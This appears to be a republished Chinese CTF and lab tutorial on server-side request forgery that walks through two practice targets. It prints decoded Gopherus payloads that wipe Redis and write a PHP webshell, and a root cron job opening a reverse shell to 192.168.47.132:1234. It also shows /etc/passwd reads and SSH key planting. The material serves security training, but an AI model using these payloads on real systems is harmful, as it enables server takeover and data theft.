SSRF - 服务器端请求伪造

news2024/11/16 17:39:53

目录

SSRF

dict协议

file协议

gopher协议

工具Gopherus

练习

练习1

练习2

docker镜像加速的方法


SSRF

SSRF(Server-Side Request Forgery:服务器端请求伪造)

其形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能,但又没有对目标地址做严格过滤与限制,导致攻击者可以传入任意的地址来让后端服务器对其发起请求,并返回对该目标地址请求的数据。

  • 数据流:攻击者----->服务器---->目标地址

curl支持很多协议,有FTP, FTPS, HTTP, HTTPS, GOPHER, TELNET, DICT, FILE以及LDAP

dict协议

dict 协议是一个在线网络字典协议,这个协议是用来架设一个字典服务的。我们可以通过dict 探测内网端口号,根据回显内容判断内容端口,主要可以用来探测一下端口信息。

可以探测端口来判断是否存在漏洞

  • fastcgi存在可以实现RCE。

    • 在存在ssrf漏洞情况下,此时可以利用程序去访问本地内网。对自己本身不限制,也许可以实现RCE。

  • redis的端口6379,可以实现未授权访问

    • 低版本上可能部分没有设置密码,并且安全模式关闭。

      • 写入webshell--知道物理路径

      • 写入任务计划--反弹shell,权限不一定高。

      • 写入公钥,直接登录服务器。基本上是最高权限

file协议

file读取文件,前提是需要知道物理路径信息 + 权限足够查看内容。比如我们可以读取问passwd文件的内容如下

 url=flie://etc/passwd

php原本不允许在前端查看,所以解析之后查看不到,可以查看源码。可以查看其它文件,一般都可以查看到。这个就是服务器的连接文件的内容。

gopher协议

  • gopher协议是一种信息查找系统,他将Internet上的文件组织成某种索引,方便用户从Internet的一处带到另一处。在WWW出现之前,GopherInternet上最主要的信息检索工具,Gopher站点也是最主要的站点,使用tcp70端口。但在WWW出现后,Gopher失去了昔日的辉煌。现在它基本过时,人们很少再使用它。

  • 它只支持文本,不支持图像。

工具Gopherus

如果你知道哪里是SSRF易受攻击的地方,那么这个工具将帮助你生成Gopher有效载荷来利用SSRF(服务器端请求伪造)并获得RCE(远程代码执行)。它还可以帮助你在受害服务器上获得反向shell。

  • MySQL (Port-3306)

  • PostgreSQL(Port-5432)

  • FastCGI (Port-9000)

  • Memcached (Port-11211)

    • 如果存储的数据被反序列化

      • Python

      • Ruby

      • PHP

  • Redis (Port-6379)

  • Zabbix (Port-10050)

  • SMTP (Port-25)

通过命令gopherus --exploit redis进行启动,启动后可以选择写入反弹shell(写入任务计划)还是phpshell(写入到根路径下的文件)。

如果选择写入phpshell,软件会要求网站的物理路径信息。如果网站的debug没关的情况下可以通过报错将网站的物理路径信息获得。之后需要写入的phpshell或者不写使用默认的webshell。软件根据选的内容自动生成攻击指令。我们通过解码查看内容是什么。

 gopher://127.0.0.1:6379/_*1 --- 字段为1
 $8
 flushall --- 字段长度为8个,目的是清空整个Redis服务器的数据。避免对写入的webshell有影响。
 ​
 ​
 *3 --- 三个字段,用来在Redis数据库中写入键值1:<?php phpinfo(); ?>
 $3  
 set
 $1
 1
 $25
 ​
 <?php phpinfo(); ?>
 ​
 *4 --- 四个字段,通过config命令对数据进行落盘,并指定落盘路径信息。
 $6
 config
 $3
 set
 $3
 dir
 $13
 /var/www/html
 *4
 $6
 config
 $3
 set
 $10
 dbfilename
 $9
 shell.php
 *1
 $4
 save
 %0

如果选择写入反弹shell,我们需要先给定一个反弹shell的地址。需要选择写入任务计划的路径。我们通过解码查看内容是什么。(在CentOS系统下大概率成功,Ubuntu系统下可能不成功)

 gopher://127.0.0.1:6379/_*1
 $8 --- 字段长度为8个,
 flushall --- 目的是清空整个Redis服务器的数据。避免对写入的webshell有影响。
 *3
 $3
 set
 $1
 1
 $69
 ​
 ​
 */1 * * * * bash -c "sh -i >& /dev/tcp/192.168.47.132/1234 0>&1" --- 反弹到1234端口
 ​
 ​
 ​
 *4
 $6
 config
 $3
 set
 $3
 dir
 $16
 /var/spool/cron/   ----- 任务计划目录
 *4
 $6
 config
 $3
 set
 $10
 dbfilename
 $4
 root   ---- 写入到root文件中,所以反弹后是以root权限执行shell,反弹回去的权限也是root权限。
 *1
 $4
 save

至于通过写公钥的方式,我们需要通过ssh-keygen来生成公私钥。我们想要入侵服务器中可以将我们的公钥存入到服务器的~/.ssh/authorized_keys文件夹下,即可匹配你的私钥进行登录。可以通过redis将数据存储到服务器的任意位置,所以我们可以将公钥写入到~/.ssh/authorized_keys文件夹下。

练习

练习1

靶场是pikachu,可以通过docker进行拉取环境。

 docker run -d -p 8765:80 8023/pikachu-expect:latest

选择第一个ssrf环境的代码分析

因为没有进行URL过滤,直接通过curl_exec函数进行请求。由于没有限制,本来是访问本地资源,但是通过curl_exec函数可以访问任意的网站资源。

curl_exec

  • 解释

    • (PHP 4 >= 4.0.2, PHP 5, PHP 7, PHP 8)

    • curl_exec — 执行指定 cURL 会话。这个函数应该在初始化 cURL 会话并且设置所有选项后调用。

  • 基本语法

    •  curl_exec(CurlHandle $handle): string|bool
       ​
       handle  ---- 由 curl_init() 返回的 cURL 句柄。
  • 返回值

    • 成功时返回 true, 或者在失败时返回 false。 然而,如果设置了 CURLOPT_RETURNTRANSFER 选项,将会在成功时返回结果,失败时返回 false。

练习2

 镜像源的拉取:docker pull ctftraining/delta_2019_web_ssrfme
 ​
 启动
 docker-compose up -d
 open http://127.0.0.1:8302/

分析代码,发现限制了dict协议,这样我们就不能探测内网端口,并且还不让读取内网数据。

我们通过尝试通过file:///etc/passwd看看这个伪协议是否能读取文件内容。

发现不能读取文件内容。通过查看代码,我们发现如果info只要存在值就可以打印出phpinfo的信息页面。一般phpinfo页面中可能会存在一些有用的信息。

我们发现此时的id是172.21.0.3,这个IP地址很有可能是一个内网地址。

我们首先通过尝试url=http://172.21.0.3:80发现页面重新打印了一边代码。所以此时我们可以通过修改端口号进行查看连接情况。所以通过抓包爆破端口号1-10000。探测太多端口没什么用,只有部分端口对我们才有用。

不同的情况下的长度是不同的。我们发现只开放的一个80端口。所以我们就不再这台服务器上浪费时间。可以尝试猜IP地址判断是否存在其他的服务器。

其他服务器的地址可能为172.21.0.1或者172.21.0.2等很多个IP地址,我们可以通过修改url=http://172.21.0.1:80判断页面回显信息判断是否存服务器。

分别查看url=http://172.21.0.1:80内容

以及url=http://172.21.0.2:80

但是url=http://172.21.0.4:80并没有内容,初步判断可能不存在。我们先使用172.21.0.2来进行端口爆破,检测端口开放情况。因为172.21.0.1是个初始化的apache初始化页面,是个html文件,而172.21.0.2看起来更像是一个php文件。

我们发现开放了6379端口,所以我们需要在目录下传递webshell,但是我们现在并不知道网站路径到底是多少。所以只能去猜,猜他在默认路径下。

我们通过Gopherus工具打一下这个网站。随便写一个PHP代码测试<?php system("id"); ?>,也可以修改一下数据落盘的位置,选择一些upload等地方权限可能相对放轻,容易成功。

传入我们生成的代码位置,加载完成之后去访问写入的shell.php文件。

没有生成shell.php文件,可能是权限不足或者二次编码,但是二次编码依然不行。可以判断是否有其他文件目录的权限比较小。可以实现我们的代码写入shell.php文件,所以我们可以找寻字典进行爆破扫描,通过查看长度来判断是否有其他目录。我们发现upload长度不一样,所以我们需要修改Gopherus工具生成代码落盘的代码数据存储位置。

但是我们发现依然不行,是不是需要考虑二次编码的问题呢?

通过二次编码此时加载的比较久,我们可以中断去访问shell.php文件。发现好像是成功写入文件。

此时我们可以重新生成代码,尝试读取一下flag。

成功读取flag文件

docker镜像加速的方法

第一个是在/etc/docker下的daemon.json,使用阿里云提供的镜像加速器进行下载

 {
     "registry-mirrors":["https://gi6dbio3.mirror.aliyuncs.com"]
 }

方法二

通过科学上网进行加速拉取,选则物理机的IP地址,并且加上代理器提供的端口(比较推荐)

具体搭建细节可以参考这篇博客https://www.cnblogs.com/Chary/p/18096678

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2076302.html

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!

相关文章

【物理学】什么是运动学和动力学?

Kinematics 和 Kinetics 是力学中的两个重要分支&#xff0c;它们虽然都涉及物体的运动&#xff0c;但关注的方面不同。 Kinematics&#xff08;运动学&#xff09; Kinematics 主要研究物体的运动&#xff0c;而不涉及导致运动的力。它关注的是运动的几何特性&#xff0c;比…

UE5学习笔记18-使用FABRIK确定骨骼的左手位置

一、在武器的骨骼资产中创建一个新的插槽 二、在动画类中添加代码 xxx.h UPROPERTY(BlueprintReadOnly, Category Character, meta (AllowPrivateAccess "true"))/** 蓝图只读 类型是Character 允许私有访问 */ FTransform LeftHandTransform;//拿武器时知道左手…

STL经典案例(三)——俺是歌手挑战赛管理系统(涉及的STL内容较多,篇幅有点长,耐心看完,相信我,一定会有收获的!)

一、需求&#xff1a;俺是歌手挑战赛比赛规则如下 目前共计12名选手报名参赛&#xff0c;选手编号为1-12号比赛分为A和B两组&#xff0c;每组6人&#xff0c;选手随机抽签进行分组比赛共两轮赛事&#xff0c;第一轮为淘汰赛&#xff0c;第二轮为决赛&#xff0c;淘汰赛中每组前…

Git —— 2、创建本地版本库

版本库 版本库又名仓库&#xff0c;英文名repository&#xff0c;这个仓库里面的所有文件都可以被Git管理起来&#xff0c;每个文件的修改.删除&#xff0c;Git都能跟踪&#xff0c;以便任何时刻都可以追踪历史&#xff0c;或者在将来某个时刻可以“还原“。   创建本地版本库…

day31-测试之性能测试工具JMeter的功能概要、元件作用域和执行顺序

目录 一、JMeter的功能概要 1.1.文件目录介绍 1).bin目录 2).docs目录 3).printable_docs目录 4).lib目录 1.2.基本配置 1).汉化 2).主题修改 1.3.基本使用流程 二、JMeter元件作用域和执行顺序 2.1.名称解释 2.2.基本元件 2.3.元件作用域 1).核心 2).提示 3).作用域的原则 2.…

【AI绘画】Midjourney前置/imagine与单图指令详解

文章目录 &#x1f4af;Midjourney前置指令/imagine什么是前置指令&#xff1f;/imaginepromptUpscale(放大)Variations&#xff08;变化&#xff09;&#x1f504;&#xff08;重新生成一组图片&#xff09; &#x1f4af;单张图片指令Upscale (细节优化)Vary&#xff08;变体…

计算机二级真题--程序填空大题 章节

每类题有一些规律&#xff0c;这里来总结一下个人做题遇到的一些规律&#xff0c;大家可以自行掌握 1.在while循环里常常会将将最后一行空着作为考点&#xff0c;例如下面第的10题&#xff0c;因为需要联系整个循环所以经常分析不出来&#xff0c;实际上for训话中也有过这种考…

无需标注数据:引领视频编辑模型达到新高度

人工智能咨询培训老师叶梓 转载标明出处 由于标注视频编辑数据的稀缺&#xff0c;开发精确且多样化的视频编辑模型一直是个挑战。目前研究者们大多聚焦于无需训练的方法&#xff0c;但这些方法在性能和编辑能力范围上都有所限制。为此Meta AI的研究团队提出了一种新的方法&…

Code Llama: Open Foundation Models for Code论文阅读

整体介绍 Code Llama 发布了3款模型&#xff0c;包括基础模型、Python 专有模型和指令跟随模型&#xff0c;参数量分别为 7B、13B、34B 和 70B。这些模型在长达 16k tokens 的序列上训练。都是基于 Llama 2。 作者针对infilling (FIM) 、长上下文、指令专门做了微调 long-con…

CSS Sprite(精灵图)

CSS Sprite也叫CSS精灵图、CSS雪碧图&#xff0c;是一种网页图片应用处理方式。它允许你将一个页面涉及到的所有零星图片都包含到一张大图中去 优点&#xff1a; 减少图片的字节减少网页的http请求&#xff0c;从而大大的提高页面的性能 原理&#xff1a; 通过background-i…

《黑神话悟空》幽魂怎么打?大头怪幽魂打法攻略

黑神话悟空第一章中许多玩家都容易被大头怪幽魂给难住&#xff0c;这算是渡劫中的第一难&#xff0c;所以不少玩家想了解黑神话悟空大头怪怎么打&#xff1f;其实大头怪打起来并不难&#xff0c;只是很多的玩家们没有了解他的弱点以及特性。小编今天就为大家整理了大头怪幽魂的…

吴艳妮牵手创维,奥运后的首个代言为什么是她?

​近日&#xff0c;吴艳妮参加奥运会的表彰大会&#xff0c;晒出了与孙颖莎、王楚钦等运动员的合照&#xff0c;并写道&#xff1a;“最幸福的一天”在网络上引发讨论&#xff0c;让人不禁想起在巴黎奥运会刚结束的时候&#xff0c;家电巨头创维官宣她作为其品牌大使的消息也是…

在不训练模型的情况下强化语言模型

文章目录 一些神奇咒语提供额外资讯拆解任务使用工具让模型彼此合作 一些神奇咒语 让模型一步一步的思考 让模型解释一下自己的答案 对模型进行情绪勒索&#xff0c;比如对模型说&#xff1a;这件事对我真的很重要&#xff01; 跟模型说”请“是没有用的&#xff1b;跟模型说“…

IO--标准函数使用方法

在学习这个知识点时&#xff0c;要清楚我们使用IO其实就是如何使用函数&#xff1b; 注意点 函数名函数参数之间的关系应用的场景&#xff0c;返回值缓冲区的概念 1、IO的分类 文件IO标准IO 重点 1、标准IO函数 fopen / fclosefprintf / fscanffputc / …

如何使用Kdrill检测Windows内核中潜在的rootkit

关于Kdrill Kdrill是一款用于分析 Windows 64b 系统内核空间安全的工具&#xff0c;该工具基于纯Python 3开发&#xff0c;旨在帮助广大研究人员评估Windows内核是否受到了rootkit攻击。 需要注意的是&#xff0c;该项目与Python2/3兼容&#xff0c;无其他依赖组件&#xff0c…

女明星玩乙游,为何会推动国乙玩家“世纪大和解”?

“震惊&#xff01;叠姐和光姐竟然世纪大和解了。” 这件在国乙圈匪夷所思、想都不敢想的事&#xff0c;竟然在一位女明星的推动下发生了&#xff0c;也因此诞生了国乙圈的“8.22事件”。 事情的起因是女艺人乃万在社交平台上发布了乙游相关言论&#xff0c;引起了乙游玩家不…

SAP 有趣的‘bug‘ 选择屏幕输入框没了

如下代码将会输出一个P_U的字段 PARAMETERS p_u TYPE string VISIBLE LENGTH 12 MEMORY ID m1.AT SELECTION-SCREEN OUTPUT.LOOP AT SCREEN.IF screen-name P_U.screen-invisible 1.MODIFY SCREEN.ENDIF.ENDLOOP. 如果我们给这个字段设置一个默认值&#xff0c;参考如下代码…

8.26-docker创建容器+打包镜像+docker文件的学习

一、回顾 创建容器&#xff1a;docker run -it --name a1 centos:latest /bin/bash 查看容器&#xff1a;docker ps&#xff08;查看正在up的容器&#xff09; docker ps -a&#xff08;查看所有的容器&#xff09; 切回宿主机&#xff1a;ctrl p q 启动容器&#xff1a;d…

Furion+SqlSugar环境配置与项目创建

一、速通一图流 二、安装 .NET 8 1. 下载与安装 .NET 8 SDK 访问 .NET 下载页面 并下载最新版本的 .NET 8 SDK。根据操作系统选择适合的安装包&#xff08;如 Windows、macOS 或 Linux&#xff09;&#xff0c;并按照提示完成安装。 2. 验证安装 打开终端或命令提示符&…

SpringMVC - 第一个 SpringMVC 程序

MVC: 模块 视图 控制器 的简写&#xff0c;表示层 属于 C V&#xff0c;业务层和逻辑层属于 M SpringMVC 是对 web 使用的一套框架&#xff0c;可以更加快捷高效的管理 web应用 所有的请求都会经过 DispatcherServlet 这一个 Servlet 支持 IoC 和 AOP 统一处理请求 可以解析多…